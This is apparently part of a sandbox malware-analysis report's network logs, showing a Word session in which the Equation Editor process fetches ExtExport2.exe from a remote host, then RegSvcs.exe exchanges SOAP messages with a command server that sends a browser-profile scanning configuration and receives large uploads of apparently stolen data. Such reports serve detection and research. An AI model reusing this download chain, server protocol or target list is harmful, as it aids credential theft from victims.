Jun 24, 2024 18:27:23.412215948 CEST  7474   49165  185.38.142.10  192.168.2.22
Jun 24, 2024 18:27:23.412256956 CEST  7474   49165  185.38.142.10  192.168.2.22
Jun 24, 2024 18:27:23.412256956 CEST  49165  7474   192.168.2.22   185.38.142.10
Jun 24, 2024 18:27:23.412272930 CEST  7474   49165  185.38.142.10  192.168.2.22
Jun 24, 2024 18:27:23.412297010 CEST  7474   49165  185.38.142.10  192.168.2.22
Jun 24, 2024 18:27:23.412298918 CEST  49165  7474   192.168.2.22   185.38.142.10
Jun 24, 2024 18:27:23.412306070 CEST  7474   49165  185.38.142.10  192.168.2.22
Jun 24, 2024 18:27:23.412314892 CEST  49165  7474   192.168.2.22   185.38.142.10
Jun 24, 2024 18:27:23.412314892 CEST  7474   49165  185.38.142.10  192.168.2.22
Jun 24, 2024 18:27:23.412339926 CEST  49165  7474   192.168.2.22   185.38.142.10
Jun 24, 2024 18:27:23.412352085 CEST  7474   49165  185.38.142.10  192.168.2.22
Jun 24, 2024 18:27:23.412353039 CEST  49165  7474   192.168.2.22   185.38.142.10
Jun 24, 2024 18:27:23.412359953 CEST  7474   49165  185.38.142.10  192.168.2.22
Jun 24, 2024 18:27:23.412384987 CEST  7474   49165  185.38.142.10  192.168.2.22
Jun 24, 2024 18:27:23.412394047 CEST  7474   49165  185.38.142.10  192.168.2.22
Jun 24, 2024 18:27:23.412401915 CEST  7474   49165  185.38.142.10  192.168.2.22
Jun 24, 2024 18:27:23.412493944 CEST  49165  7474   192.168.2.22   185.38.142.10
Jun 24, 2024 18:27:23.412513971 CEST  7474   49165  185.38.142.10  192.168.2.22
Jun 24, 2024 18:27:23.412523031 CEST  7474   49165  185.38.142.10  192.168.2.22
                                                Jun 24, 2024 18:27:23.412545919 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.412554979 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.412563086 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.412573099 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.412612915 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.412621975 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.412646055 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.412666082 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.412676096 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.412713051 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.412723064 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.415872097 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.415885925 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.415921926 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.415973902 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.415982962 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.415998936 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.416008949 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.416018963 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.416714907 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.416724920 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.416734934 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.416763067 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.416773081 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.416784048 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.416791916 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.416834116 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.416912079 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.416920900 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.416939020 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.416946888 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417042017 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417051077 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417093992 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417103052 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417110920 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417221069 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417229891 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417238951 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417248011 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417256117 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417264938 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417306900 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417315006 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417323112 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417330980 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417337894 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417416096 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417424917 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417433023 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417440891 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417448997 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417457104 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417537928 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417546988 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417555094 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417562962 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417567015 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417581081 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417588949 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417635918 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417644978 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417651892 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417660952 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417669058 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417676926 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417691946 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417700052 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417752981 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417762995 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417771101 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417778015 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417793989 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417802095 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417831898 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417840958 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417892933 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417902946 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.417911053 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418078899 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418088913 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418097019 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418121099 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418129921 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418175936 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418184996 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418217897 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418263912 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418272018 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418318033 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418397903 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418452978 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418462038 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418826103 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418836117 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418843985 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418852091 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418860912 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418869019 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.418876886 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.420802116 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.420814037 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.420830965 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.420840025 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.420855999 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.420865059 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.421555042 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.421744108 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.421753883 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.421812057 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.421822071 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.421838999 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.421848059 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.421911955 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422046900 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422055960 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422064066 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422125101 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422208071 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422290087 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422298908 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422363043 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422370911 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422475100 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422483921 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422607899 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422657013 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422667027 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422709942 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422741890 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422827959 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422837019 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422885895 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422930002 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:23.422940016 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:24.141536951 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:24.173197031 CEST491657474192.168.2.22185.38.142.10
                                                Jun 24, 2024 18:27:24.181166887 CEST747449165185.38.142.10192.168.2.22
                                                Jun 24, 2024 18:27:24.181274891 CEST491657474192.168.2.22185.38.142.10
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Jun 24, 2024 18:27:07.695571899 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
                                                Jun 24, 2024 18:27:07.702992916 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
                                                Jun 24, 2024 18:27:19.391134977 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8
                                                Jun 24, 2024 18:27:19.409841061 CEST | 57893 | 53 | 192.168.2.22 | 8.8.8.8
                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                Jun 24, 2024 18:27:07.695571899 CEST | 192.168.2.22 | 8.8.8.8 | 0x9b31 | Standard query (0) | universalmovies.top | A (IP address) | IN (0x0001) | false
                                                Jun 24, 2024 18:27:19.391134977 CEST | 192.168.2.22 | 8.8.8.8 | 0xdf9b | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001) | false
                                                Jun 24, 2024 18:27:19.409841061 CEST | 192.168.2.22 | 8.8.8.8 | 0x6d30 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001) | false
                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                Jun 24, 2024 18:27:07.702992916 CEST | 8.8.8.8 | 192.168.2.22 | 0x9b31 | No error (0) | universalmovies.top | | 172.67.162.95 | A (IP address) | IN (0x0001) | false
                                                Jun 24, 2024 18:27:07.702992916 CEST | 8.8.8.8 | 192.168.2.22 | 0x9b31 | No error (0) | universalmovies.top | | 104.21.74.191 | A (IP address) | IN (0x0001) | false
                                                Jun 24, 2024 18:27:19.401240110 CEST | 8.8.8.8 | 192.168.2.22 | 0xdf9b | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001) | false
                                                Jun 24, 2024 18:27:19.419294119 CEST | 8.8.8.8 | 192.168.2.22 | 0x6d30 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001) | false
                                                • universalmovies.top
                                                • 185.38.142.10:7474
                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.2.22 | 49163 | 185.38.142.10 | 7474 | 3116 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Jun 24, 2024 18:27:12.583518028 CEST | 239 | OUT | POST / HTTP/1.1
                                                Content-Type: text/xml; charset=utf-8
                                                SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                Host: 185.38.142.10:7474
                                                Content-Length: 137
                                                Expect: 100-continue
                                                Accept-Encoding: gzip, deflate
                                                Connection: Keep-Alive
                                                Jun 24, 2024 18:27:13.259237051 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                Jun 24, 2024 18:27:13.415976048 CEST | 359 | IN | HTTP/1.1 200 OK
                                                Content-Length: 212
                                                Content-Type: text/xml; charset=utf-8
                                                Server: Microsoft-HTTPAPI/2.0
                                                Date: Mon, 24 Jun 2024 16:27:13 GMT
                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                Jun 24, 2024 18:27:18.433298111 CEST | 222 | OUT | POST / HTTP/1.1
                                                Content-Type: text/xml; charset=utf-8
                                                SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                Host: 185.38.142.10:7474
                                                Content-Length: 144
                                                Expect: 100-continue
                                                Accept-Encoding: gzip, deflate
                                                Jun 24, 2024 18:27:18.795423031 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                Jun 24, 2024 18:27:19.327034950 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                Content-Length: 4744
                                                Content-Type: text/xml; charset=utf-8
                                                Server: Microsoft-HTTPAPI/2.0
                                                Date: Mon, 24 Jun 2024 16:27:19 GMT
                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.2.22 | 49165 | 185.38.142.10 | 7474 | 3116 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Jun 24, 2024 18:27:22.061207056 CEST | 220 | OUT | POST / HTTP/1.1
                                                Content-Type: text/xml; charset=utf-8
                                                SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                Host: 185.38.142.10:7474
                                                Content-Length: 246270
                                                Expect: 100-continue
                                                Accept-Encoding: gzip, deflate
                                                Jun 24, 2024 18:27:23.395015001 CEST | 294 | IN | HTTP/1.1 200 OK
                                                Content-Length: 147
                                                Content-Type: text/xml; charset=utf-8
                                                Server: Microsoft-HTTPAPI/2.0
                                                Date: Mon, 24 Jun 2024 16:27:23 GMT
                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                Jun 24, 2024 18:27:23.396502018 CEST | 216 | OUT | POST / HTTP/1.1
                                                Content-Type: text/xml; charset=utf-8
                                                SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                Host: 185.38.142.10:7474
                                                Content-Length: 246262
                                                Expect: 100-continue
                                                Accept-Encoding: gzip, deflate
                                                Jun 24, 2024 18:27:24.141536951 CEST | 408 | IN | HTTP/1.1 200 OK
                                                Content-Length: 261
                                                Content-Type: text/xml; charset=utf-8
                                                Server: Microsoft-HTTPAPI/2.0
                                                Date: Mon, 24 Jun 2024 16:27:23 GMT
                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
                                                Jun 24, 2024 18:27:24.181166887 CEST | 408 | IN | HTTP/1.1 200 OK
                                                Content-Length: 261
                                                Content-Type: text/xml; charset=utf-8
                                                Server: Microsoft-HTTPAPI/2.0
                                                Date: Mon, 24 Jun 2024 16:27:23 GMT
                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                Session ID:0
                                                Source IP:192.168.2.22
                                                Source Port:49162
                                                Destination IP:172.67.162.95
                                                Destination Port:443
                                                PID:2728
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Timestamp:2024-06-24 16:27:08 UTC
                                                Bytes transferred:320
                                                Direction:OUT
                                                Data:GET /ExtExport2.exe HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: universalmovies.top
                                                Connection: Keep-Alive
                                                Timestamp:2024-06-24 16:27:08 UTC
                                                Bytes transferred:845
                                                Direction:IN
                                                Data:HTTP/1.1 200 OK
                                                Date: Mon, 24 Jun 2024 16:27:08 GMT
                                                Content-Type: application/octet-stream
                                                Content-Length: 644096
                                                Connection: close
                                                Last-Modified: Mon, 24 Jun 2024 07:55:16 GMT
                                                ETag: "66792664-9d400"
                                                Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                Cache-Control: max-age=315360000
                                                CF-Cache-Status: HIT
                                                Age: 27764
                                                Accept-Ranges: bytes
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Axg9amKknZN73B%2BpmIzJl8AytSfUvRUywELSOtsWTfgeU6gI6ijf0%2FK7SAUdo9qEHwqiAJPZqd14zaLi9%2FhrNAUnI3qTv1dpr5W0cDDjkFAJjOkVA6Vbt5bsG3XvR07J35IrkMfN"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                X-Content-Type-Options: nosniff
                                                Server: cloudflare
                                                CF-RAY: 898e1561589a1a1f-EWR
                                                alt-svc: h3=":443"; ma=86400



                                                Target ID:0
                                                Start time:12:27:03
                                                Start date:24/06/2024
                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                Wow64 process (32bit):false
